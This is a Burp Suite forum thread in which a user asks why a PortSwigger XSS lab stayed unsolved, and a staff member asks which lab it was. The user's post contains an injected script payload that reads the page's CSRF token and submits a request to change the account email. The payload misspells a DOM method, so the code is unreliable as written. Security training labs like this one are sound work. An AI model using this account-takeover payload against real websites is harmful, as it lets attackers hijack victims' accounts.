Burp Suite User Forum

Create new post

lab not solved although i did

thexyz | Last updated: Sep 03, 2024 04:29PM UTC

i solved the last practitioner xss lab using this payload <script> window.addEventListener('DOMContentLoaded',function(){ var token = document.getElementsByNameBy('csrf')[0].value; var data = new FormData(); data.append('csrf', token); data.append('email', 'email@gmail.com'); fetch('/my-account/change-email',{ method: 'POST', mode: 'no-cors', body: data }); }); </script> but the lab remained unsolved i tried to resolve it several times but still the same issue

Ben, PortSwigger Agent | Last updated: Sep 04, 2024 06:41AM UTC

Hi, Are you able to provide us with the specific name of the lab that you are referring to so that we can take a look at this for you?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.